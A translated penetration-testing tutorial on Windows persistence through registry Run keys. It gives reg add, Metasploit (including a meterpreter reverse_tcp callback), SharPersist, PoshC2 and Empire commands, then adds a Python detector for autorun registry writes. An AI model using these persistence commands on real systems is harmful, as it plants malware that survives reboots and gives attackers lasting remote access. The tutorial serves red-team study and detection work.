Translation note: this article was compiled and translated by Bypass for security research and study purposes only. Original article: https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/
Command line
```
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462872.jpg)
```
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-15734628721.jpg)
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462872.jpeg)
```
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.dll"
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462873.png)
Metasploit
```
run persistence -U -P windows/x64/meterpreter/reverse_tcp -i 5 -p 443 -r 10.0.2.21
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462873.jpg)
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-15734628731.png)
```
use post/windows/manage/persistence_exe
set REXEPATH /tmp/pentestlab.exe
set SESSION 2
set STARTUP USER
set LOCALEXEPATH C:\tmp
run
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462873.jpeg)
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-15734628731.jpeg)
```
set STARTUP SYSTEM
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462874.jpeg)
SharPersist
```
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c C:\tmp\pentestlab.exe" -k "hkcurun" -v "pentestlab" -m add
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462874.png)
```
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c C:\tmp\pentestlab.exe" -k "hklmrun" -v "pentestlab" -m add -o env
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-15734628741.png)
```
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "hklmrunonce" -v "Pentestlab" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "hklmrunonceex" -v "Pentestlab" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "hkcurunonce" -v "Pentestlab" -m add
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462875.jpg)
```
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "logonscript" -m add
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462875.png)
PoshC2
```
install-persistence
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462876.png)
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462876.jpeg)
Empire
```
HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Debug
HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Debug
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-1573462876.jpg)
```
usemodule persistence/userland/registry
usemodule persistence/elevated/registry*
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-15734628761.jpeg)
```
HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```
![](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-118009-15734628761.jpg)
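From the defender's side, every technique above ends in a value being written under a small, well-known set of autorun keys, which makes the write itself a good detection point. The following is an added example, not code from the original post or from any of the tools it covers: a Python classifier that takes the two fields a Sysmon-style "registry value set" event carries (the registry path written and the data written), reports writes under the Run, RunOnce, RunOnceEx, RunServices and RunServicesOnce keys, and notes whether the command points into a user-writable location such as C:\tmp or a user profile. The event field names, the SID and all sample events are constructed.

```python
import re
from typing import Optional

# Autostart keys covered above, hive-relative and lower-cased for matching.
AUTORUN_KEYS = (
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\runonce",
    r"software\microsoft\windows\currentversion\runonceex",
    r"software\microsoft\windows\currentversion\runservices",
    r"software\microsoft\windows\currentversion\runservicesonce",
)
# Hive prefix as Sysmon's TargetObject or a reg.exe path spells it (HKU\<SID> is a user hive).
HIVE_RE = re.compile(r"^(?:hklm|hkcu|hkey_local_machine|hkey_current_user|hku\\[^\\]+)\\", re.I)
MACHINE_RE = re.compile(r"^(?:hklm|hkey_local_machine)\\", re.I)
# Locations an unprivileged user can write to; an autorun pointing here deserves a closer look.
USER_WRITABLE_RE = re.compile(r'(?:^|[\s"])[a-z]:\\(?:tmp|temp|users)\\', re.I)

def classify_registry_event(target_object: str, details: str) -> Optional[dict]:
    """Classify one 'registry value set' event: target_object is the full path of the
    value written (hive first, value name last), details is the data, i.e. the command
    that will run at logon. Returns a finding for writes under an autorun key, else None."""
    key, _, value_name = HIVE_RE.sub("", target_object).rpartition("\\")
    key = key.lower()
    for autorun in AUTORUN_KEYS:
        # Exact key, or a subkey of it (RunOnceEx uses numbered subkeys and a Depend subkey).
        if key == autorun or key.startswith(autorun + "\\"):
            return {
                "key": autorun.rsplit("\\", 1)[1],  # run, runonce, runonceex, ...
                "machine_wide": bool(MACHINE_RE.match(target_object)),
                "value_name": value_name,
                "command": details,
                "user_writable_path": bool(USER_WRITABLE_RE.search(details)),
            }
    return None

# Run the classifier over (TargetObject, Details) pairs and keep only the hits.
def scan(events):
    return [f for f in (classify_registry_event(t, d) for t, d in events) if f]

# Constructed sample events mirroring the reg add, RunOnceEx and SharPersist entries above.
SAMPLE_EVENTS = [
    (r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Pentestlab",
     r"C:\Users\pentestlab\pentestlab.exe"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\Pentestlab",
     r"C:\tmp\pentestlab.dll"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\Pentestlab",
     r"C:\Windows\System32\cmd.exe /c C:\tmp\pentestlab.exe"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Example\DisplayName", "Example"),
]
```

The SharPersist variants that launch `cmd.exe /c pentestlab.exe` without a full path are still reported as autorun writes, but the user-writable flag stays false for them, so the key match, not the path heuristic, should drive the alert.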